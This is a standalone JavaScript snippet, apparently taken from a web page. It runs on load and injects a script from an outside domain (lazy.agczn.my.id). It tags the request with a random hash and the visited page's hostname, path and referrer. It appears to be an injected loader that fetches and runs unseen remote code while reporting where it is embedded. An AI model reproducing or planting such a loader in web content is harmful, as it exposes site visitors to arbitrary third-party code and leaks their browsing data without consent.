(()=>{ const r_lazy = (n)=>{ for (var r = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"], e = n, t = new Array, a = 0; a <= e - 1; a++) { t[a] = r[parseInt(Math.random() * r.length)]; t = t; } return t.join(""); }; const el_lazy = document.createElement("script"); el_lazy.setAttribute("src","//lazy.agczn.my.id/js15_as.js"+"?hash="+r_lazy(12)+"&host="+encodeURIComponent(window.location.hostname)+"&path="+encodeURIComponent(window.location.pathname)+"&ref="+encodeURIComponent(document.referrer)); el_lazy.setAttribute("defer",""); document.querySelector("body").append(el_lazy); })();